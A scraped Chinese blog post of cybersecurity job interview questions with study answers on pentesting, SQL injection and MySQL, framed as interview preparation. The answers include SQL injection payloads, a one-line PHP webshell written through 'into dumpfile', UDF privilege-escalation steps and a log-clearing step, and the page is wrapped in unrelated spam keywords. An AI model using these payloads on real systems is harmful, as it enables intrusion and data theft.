最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網 會員登陸 & 注冊

網絡安全崗秋招面試題及面試經驗分享

2023-07-13 16:26 作者:硬核黑客知識  | 我要投稿

Hello,各位小伙伴,我作為一名網絡安全工程師曾經在秋招中斬獲??+個offer??,并在國內知名互聯網公司任職過的職場老油條,希望可以將我的面試的網絡安全大廠面試題和好運分享給大家~

轉眼2023年秋招已經快到了金九銀??的關鍵階段,寶子們簡歷抓緊準備投遞起來呀,沖沖沖?

隨著國家政策的扶持,網絡安全行業(yè)也越來越為大眾所熟知,相應的想要進入到網絡安全行業(yè)的人也越來越多,為了更好地進行工作,除了學好網絡安全知識外,還要應對企業(yè)的面試。

所以在這里我歸總了一些網絡安全方面的常見面試題,希望對大家有所幫助。

內容來自于社群內2023屆畢業(yè)生在畢業(yè)前持續(xù)整理、收集的安全崗面試題及面試經驗分享~



一、字節(jié)跳動-滲透測試實習生


自我介紹
滲透的流程
信息收集如何處理子域名爆破的泛解析問題
如何繞過CDN查找真實ip
phpinfo你會關注哪些信息
有沒有了解過權限維持
說一個你感覺不錯的漏洞,展開講講
輸出到href的XSS如何防御
samesite防御CSRF的原理
CSRF防御
json格式的CSRF如何防御
瀏覽器解析順序和解碼順序
過濾逗號的SQL注入如何繞過
過濾limit后的逗號如何繞過
fastjson相關漏洞
說一個你知道的python相關的漏洞(SSTI原理,利用過程,payload相關的東西)開放性問答


二、深信服-漏洞研究員實習



自我介紹
在xx實習的時候做什么東西
滲透測試的思路簡單說一下
護網在里面擔當一個什么樣的角色
紅隊的一些思路
拿下系統后有沒有做橫向
前段時間那個log4j有研究嗎,可以簡單說一下嗎
(繼上一個問題)有哪些混淆繞過的方法
內存馬有沒有了解過
冰蝎、哥斯拉這些工具有沒有了解過
做攻擊隊的時候有沒有研究過什么攻擊,比如研究一些工具還是魔改什么的
那么多漏洞和攻擊,比較擅長哪一個
說一下shiro反序列化的形成原因、利用鏈
對一些bypass的方法有沒有了解過,有什么姿勢可以簡單介紹一下
反問


三、字節(jié)跳動-安全研究實習生



你投的崗位是安全研究實習生,你了解我們這邊主要是做什么的嗎
自我介紹
現在有什么比較想做的方向嗎,比如你寫的代碼審計、攻防演練、你在學校的研究方向(密碼學)其實是三個大方向,現在有什么比較想做的嗎
有沒有審過開源框架、cms、中間件之類的
面試官介紹了工作內容
我看你簡歷上有幾段實習經歷和項目經歷,先聊一下實習經歷吧,在A主要做什么的
詳細聊聊入侵檢測主要在做什么,遇到的問題
關于入侵檢測產生大量誤報的原因,有沒有分析過,有沒有比較好的解決方法
和A比起來,B的應該就比較偏攻擊方對吧,有打仗(霧,面試官好像確實是這么說的)有代碼審計,聊一下在B主要做了些什么
審表達式引擎的步驟和思路
剛剛你說的審計聽起來好像和普通開發(fā)的審計差不多,都是通過程序流、文檔去做,有沒有從安全方面入手審計一些項目
xxe是怎么造成的,從代碼層面來看
我看你簡歷有很多攻防演練經歷對吧,這幾段攻防演練經歷有沒有哪一次印象比較深刻的,挑一個聊一聊
你的這次攻擊好像更多的是利用弱口令,有沒有一些更有技巧的方法
這個頭像上傳的webshell是怎么上傳的
還有什么其他的檢驗方式?要怎么繞過?
這兩天log4j漏洞很火,有沒有去了解一下
面試官最后介紹業(yè)務
反問環(huán)節(jié)


四、長亭科技-安全服務工程師



自我介紹
web滲透測試有沒有過實戰(zhàn)
講一下sql注入原理
有沒有從代碼層面了解過sql注入的成因(反問代碼層面指的是不是sql語句,答是)
了不了解xss,有沒有從代碼層面了解xss的原理
對owasp top10漏洞哪個比較了解
講一講怎么防御sql注入
sql注入怎么繞過過濾
問了護網時xx有沒有成為靶標,有沒有對攻擊隊行為做過研判
在xx護網時的工作內容,有沒有做過流量包、數據包的研判
學校攻防演練時擔任的角色,主要工作內容,滲透測試的思路,有什么成果(這個問的還是挺細的,具體到分配的任務、有沒有拿下主機或者域控、攻防演練的形式和持續(xù)時間等都聊了)
平時ctf打的多不多,有什么成績
平時會不會關注一些新穎的漏洞,會不會做代碼審計,比如shiro漏洞等有沒有做過漏洞復現
對釣魚郵件這些有沒有什么了解(因為上面聊xx護網時說了釣魚郵件和微信釣魚的事)
目前學習的方向是什么
最后介紹人才需求
反問環(huán)節(jié)


五、騰訊-安全技術實習生



自我介紹
sql注入了解嗎,講一講二次注入的原理
二次注入要怎么修復
sql注入過waf了解嗎,若一個sql注入過濾了information關鍵詞,怎么繞過
Redis未授權訪問
滲透測試的一個完整流程
打ctf的時候有沒有遇到什么印象特別深的題目
文件下載漏洞有沒有什么比較好的利用方式
利用文件下載漏洞找文件名具體是找什么文件名(讀取文件一般會讀取哪些文件)(ctf中?實戰(zhàn)中?)
命令執(zhí)行漏洞,http不出網有什么比較好的處理方法(發(fā)散一點說)
接上一題,通過隧道通信,詳細講講通過什么類型的隧道,講講具體操作
漏洞預警
有沒有復現過中間件類型的漏洞(有沒有完整的復現過漏洞)
在學校的攻防演練中扮演的角色的主要職責是什么


六、小鵬汽車-安全工程師



自我介紹
有沒有挖過src?
平時web滲透怎么學的,有實戰(zhàn)嗎?有過成功發(fā)現漏洞的經歷嗎?
做web滲透時接觸過哪些工具
xxe漏洞是什么?ssrf是什么?
打ctf的時候負責什么方向的題
為什么要搞信息安全,對安全這一塊有多大的興趣,以后會不會轉行,還是打算一直從事安全方面工作
自己平時怎么學安全的,如果讓你做一個新的方向(app安全),會投入多少時間去學習,還是說有自己想做的方向
聊一聊代碼審計的流程
平時是怎么做代碼審計的
有沒有審計過開源框架、CMS?
怎么判斷一個數據庫是mysql還是oracle的?
sql注入的種類,利用方式?
聊一聊sql注入的原理及防御思路
做開發(fā)的時候用的是什么語言
做java開發(fā)的時候用過什么框架,能不能做java安全開發(fā)
有沒有做過安卓開發(fā)
有沒有用python寫過工具?
msf利用的是哪個漏洞,有沒有成功反彈?
護網的時候主要做了些什么,聊一聊對安全產品的理解
公司現在需要做app安全的人,現在要你做的話,你會去學嗎,或者說感興趣嗎,還是說有別的想做的,不想做app安全,能投入多少時間去學
內網滲透了解嗎?聊一聊內網滲透的思路
面試題合集


七、大廠高頻面試題匯總


這次花了三個月的時間整理各大安全廠商的網絡安全服務職位(包括但不僅限于:安全服務工程師,安全運營工程師,安全運維工程師,安全攻防工程師“)的面試問題。

話不多說,讓我們一起學習吧

目前來說還有非常多的不嚴謹和冗余,懇請小伙伴們指正修改!


7.1、SQL注入防護方法
失效的身份認證和會話管理
跨站腳本攻擊XSS
直接引用不安全的對象
安全配置錯誤
敏感信息泄露
缺少功能級的訪問控制
跨站請求偽造CSRF
使用含有已知漏洞的組件
未驗證的重定向和轉發(fā)
7.2、常見的Web安全漏洞
SQL注入
XSS
文件遍歷、文件上傳、文件下載
垂直越權、水平越權
邏輯漏洞
首先對于新人來說,大多數同學都是沒有實戰(zhàn)經驗的,對應面試官提問聊聊你的滲透測試實戰(zhàn),但很多人卻無從開口。
7.3、給你一個網站你是如何來滲透測試的??
在獲取書面授權的前提下。


1)信息收集

獲取域名的whois信息,獲取注冊者郵箱姓名電話等。
查詢服務器旁站以及子域名站點,因為主站一般比較難,所以先看看旁站有沒有通用性的cms或者其他漏洞。
查看服務器操作系統版本,web中間件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞
查看IP,進行IP地址端口掃描,對響應的端口進行漏洞探測,比如 rsync,心臟出血,mysql,ftp,ssh弱口令等
掃描網站目錄結構,看看是否可以遍歷目錄,或者敏感文件泄漏,比如php探針
google hack 進一步探測網站的信息,后臺,敏感文件

2)漏洞掃描

開始檢測漏洞,如XSS,XSRF,sql注入,代碼執(zhí)行,命令執(zhí)行,越權訪問,目錄讀取,任意文件讀取,下載,文件包含,
遠程命令執(zhí)行,弱口令,上傳,編輯器漏洞,暴力破解等

3)漏洞利用

利用以上的方式拿到webshell,或者其他權限

4)權限提升

提權服務器,比如windows下mysql的udf提權,serv-u提權,windows低版本的漏洞,如iis6,pr,巴西烤肉,
linux藏牛漏洞,linux內核版本漏洞提權,linux下的mysql system提權以及oracle低權限提權

5) 日志清理

6)總結報告及修復方案


7.4、滲透測試流程
項目訪談
信息收集:whois、網站源IP、旁站、C段網站、服務器系統版本、容器版本、程序版本、數據庫類型、二級域名、防火墻、維護者信息
漏洞掃描:Nessus, AWVS
手動挖掘:邏輯漏洞
驗證漏洞
修復建議
(如果有)基線檢查/復驗漏洞
輸出報告
概述
測試基本信息
測試范圍
測試時間
測試任務
測試過程
信息安全風險綜合分析
整體風險分析
風險影響分析
系統安全分析
安全漏洞列表
解決方案建議
復測報告
SQL面試題


7.5、SQL注入類型?
基于報錯注入
基于布爾的注入,根據返回頁面判斷條件真假的注入
基于時間的盲注,不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執(zhí)行(即頁面返回時間是否增加)來判斷。
寬字節(jié)注入
聯合查詢,可以使用 union 的情況下的注入。
堆查詢注入,可以同時執(zhí)行多條語句的執(zhí)行時的注入。
7.6、SQL注入的原理
通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執(zhí)行惡意的SQL命令。通常未經檢查或者未經充分檢查的用戶輸入數據或代碼編寫問題,意外變成了代碼被執(zhí)行。

7.7、如何進行SQL注入的防御
關閉應用的錯誤提示
加waf
對輸入進行過濾
限制輸入長度
限制好數據庫權限,drop/create/truncate等權限謹慎grant
預編譯好sql語句,python和Php中一般使用?作為占位符。這種方法是從編程框架方面解決利用占位符參數的sql注入,只能說一定程度上防止注入。還有緩存溢出、終止字符等。
數據庫信息加密安全(引導到密碼學方面)。不采用md5因為有彩虹表,一般是一次md5后加鹽再md5
清晰的編程規(guī)范,結對/自動化代碼 review ,加大量現成的解決方案(PreparedStatement,ActiveRecord,歧義字符過濾, 只可訪問存儲過程 balabala)已經讓 SQL 注入的風險變得非常低了。
具體的語言如何進行防注入,采用什么安全框架
7.8、sqlmap,怎么對一個注入點注入?
如果是get型號,直接,sqlmap -u “諸如點網址”.
如果是post型諸如點,可以sqlmap -u "注入點網址” --data=“post的參數”
如果是cookie,X-Forwarded-For等,可以訪問的時候,用burpsuite抓包,注入處用*號替換,放到文件里,然后sqlmap -r “文件地址”
7.9、mysql的網站注入,5.0以上和5.0以下有什么區(qū)別?
10年前就出了5.0,現在都到5.7了,沒啥意義的問題
5.0以下沒有information_schema這個系統表,無法列表名等,只能暴力跑表名。
5.0以下是多用戶單操作,5.0以上是多用戶多操做。
7.10、MySQL存儲引擎?
1、InnoDB:主流的存儲引擎。支持事務、支持行鎖、支持非鎖定讀、支持外鍵約束

為MySQL提供了具有提交、回滾和崩潰恢復能力的事物安全(ACID兼容)存儲引擎。InnoDB鎖定在行級并且也在 SELECT語句中提供一個類似Oracle的非鎖定讀。這些功能增加了多用戶部署和性能。在SQL查詢中,可以自由地將InnoDB類型的表和其他MySQL的表類型混合起來,甚至在同一個查詢中也可以混合
InnoDB存儲引擎為在主內存中緩存數據和索引而維持它自己的緩沖池。InnoDB將它的表和索引在一個邏輯表空間中,表空間可以包含數個文件(或原始磁盤文件)。這與MyISAM表不同,比如在MyISAM表中每個表被存放在分離的文件中。InnoDB表可以是任何尺寸,即使在文 件尺寸被限制為2GB的操作系統上
InnoDB支持外鍵完整性約束,存儲表中的數據時,每張表的存儲都按主鍵順序存放,如果沒有顯示在表定義時指定主鍵,InnoDB會為每一行生成一個6字節(jié)的ROWID,并以此作為主鍵
2、MyISAM:訪問速度快,不支持事務,逐漸被淘汰
3、MEMORY:BTREE索引或者HASH索引。將表中數據放在內存中,并發(fā)性能差。
4、MERGE、Archive等等不常用的

7.11、什么是事務?
事務是一組原子性的SQL語句或者說是一個獨立的工作單元,如果數據庫引擎能夠成功對數據庫應用這組SQL語句,那么就執(zhí)行,如果其中有任何一條語句因為崩潰或其它原因無法執(zhí)行,那么所有的語句都不會執(zhí)行。也就是說,事務內的語句,要么全部執(zhí)行成功,要么全部執(zhí)行失敗。
舉個銀行應用的典型例子:

假設銀行的數據庫有兩張表:支票表和儲蓄表,現在某個客戶A要從其支票賬戶轉移2000元到其儲蓄賬戶,那么至少需求三個步驟:

a.檢查A的支票賬戶余額高于2000元;

b.從A的支票賬戶余額中減去2000元;

c.在A的儲蓄賬戶余額中增加2000元。

這三個步驟必須要打包在一個事務中,任何一個步驟失敗,則必須要回滾所有的步驟,否則A作為銀行的客戶就可能要莫名損失2000元,就出問題了。這就是一個典型的事務,這個事務是不可分割的最小工作單元,整個事務中的所有操作要么全部提交成功,要么全部失敗回滾,不可能只執(zhí)行其中一部分,這也是事務的原子性特征。

7.12、讀鎖和寫鎖
讀鎖是共享的,即相互不阻塞的,多個客戶在同一時刻可以讀取同一資源,互不干擾。寫鎖是排他的,即一個寫鎖會阻塞其它的寫鎖和讀鎖,只有這樣,才能確保給定時間內,只有一個用戶能執(zhí)行寫入,防止其它用戶讀取正在寫入的同一資源。寫鎖優(yōu)先級高于讀鎖。

7.13、MySQL的索引
索引是幫助MySQL高效獲取數據的數據結構。MYISAM和InnoDB存儲引擎只支持BTree索引;MEMORY和HEAP儲存引擎可以支持HASH和BTREE索引。

7.14、ORDER BY在注入的運用
order by后面可以加字段名,表達式和字段的位置,字段的位置需要是整數型。

7.15、GPC是什么?GPC之后怎么繞過?
如果magic_quotes_gpc=On,PHP解析器就會自動為post、get、cookie過來的數據增加轉義字符“\”,以確保這些數據不會引起程序,特別是數據庫語句因為特殊字符(認為是php的字符)引起的污染。

7.16、Mysql一個@和兩個@什么區(qū)別
@為用戶變量,使用SET @var1=1賦值
@@ 為系統變量 ,包括全局變量show global variables \G;和會話變量show session variables \G;

7.17、注入/繞過常用的函數
1、基于布爾SQL盲注

left(database(),1)>'s'
ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
regexp正則注入 select user() regexp '^[a-z]';
select user() like 'ro%'


2、基于報錯的SQL盲注
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
2)通過floor報錯 向下取整
3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10).exp()select * from test where id=1 and exp(~(select * from(select user())a));

3、延時注入如何來判斷?

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

7.18、盲注和延時注入的共同點?
都是一個字符一個字符的判斷

7.19、如何拿一個網站的webshell?
上傳,后臺編輯模板,sql注入寫文件,命令執(zhí)行,代碼執(zhí)行,
一些已經爆出的cms漏洞,比如dedecms后臺可以直接建立腳本文件,wordpress上傳插件包含腳本文件zip壓縮包等

7.20、sql注入寫文件都有哪些函數?
select ‘一句話’ into outfile ‘路徑’
select ‘一句話’ into dumpfile ‘路徑’
select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

7.21、各種寫shell的問題
1、寫shell用什么函數?

select '<?php phpinfo()> into outfile 'D:/shelltest.php'
dumpfile
file_put_contents
2、outfile不能用了怎么辦?

select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';可以UDF提權 https://www.cnblogs.com/milantgh/p/5444398.html
3、dumpfile和outfile有什么不一樣?outfile適合導庫,在行末尾會寫入新行并轉義,因此不能寫入二進制可執(zhí)行文件。

4、sleep()能不能寫shell?

5、寫shell的條件?

用戶權限
目錄讀寫權限
防止命令執(zhí)行:disable_functions,禁止了disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,但是可以用dl擴展執(zhí)行命令或者ImageMagick漏洞 https://www.waitalone.cn/imagemagic-bypass-disable_function.html
open_basedir: 將用戶可操作的文件限制在某目錄下


7.22、sql注入寫文件都有哪些函數?
select ‘一句話’ into outfile ‘路徑’
select ‘一句話’ into dumpfile ‘路徑’
select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

7.23、sql二次注入
第一次進行數據庫插入數據的時候,僅僅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 對其中的特殊字符進行了轉義,在寫入數據庫的時候還是保留了原來的數據,但是數據本身還是臟數據。
在將數據存入到了數據庫中之后,開發(fā)者就認為數據是可信的。在下一次進行需要進行查詢的時候,直接從數據庫中取出了臟數據,沒有進行進一步的檢驗和處理,這樣就會造成SQL的二次注入。

交友網站,填寫年齡處是一個注入點,頁面會顯示出與你相同年齡的用戶有幾個。使用and 1=1確定注入點,用order by探測列數,union select探測輸出點是第幾列,

暴庫 group_concat(schema_name) from information_schema.schemata
暴表 group_concat(table_name) from information_schema.schemata where table_schema='hhh'
獲取數據 concat(flag) from flag
修復:在從數據庫或文件中取數據的時候,也要進行轉義或者過濾。

7.24、SQL和NoSQL的區(qū)別
SQL關系型數據庫,NoSQL(Not only SQL)非關系型數據庫

1.SQL優(yōu)點

關系型數據庫是指用關系數學模型來表示的數據,其中是以二維表的形式描述數據。
結構穩(wěn)定,不易修改,常用聯表查詢
查詢能力高,可以操作很復雜的查詢
一致性高,處理數據會使用封鎖保證數據不被改變
表具有邏輯性,易于理解
2.SQL缺點

不適用高并發(fā)讀寫
不適用海量數據高效讀寫
層次多,擴展性低
維護一致性開銷大
涉及聯表查詢,復雜,慢
3.NoSQL優(yōu)點

采用鍵值對存儲數據
由于數據之間沒有關系,所以易擴展,也易于查詢
數據結構靈活,每個數據都可以有不同的結構
由于降低了一致性的要求,所以查詢速度更快


?面試題pdf文檔后臺留言:學習


網絡安全崗秋招面試題及面試經驗分享的評論 (共 條)

分享到微博請遵守國家法律
安义县| 浮梁县| 安图县| 文成县| 新邵县| 白银市| 武冈市| 酉阳| 晴隆县| 乌兰浩特市| 博乐市| 广饶县| 乐昌市| 武冈市| 锡林浩特市| 太原市| 怀柔区| 侯马市| 阿尔山市| 牡丹江市| 和龙市| 稷山县| 淮安市| 宜春市| 金华市| 巴塘县| 巨野县| 平利县| 梁河县| 清涧县| 上杭县| 斗六市| 酒泉市| 来安县| 慈利县| 安仁县| 黎川县| 长宁区| 佛教| 秀山| 红安县|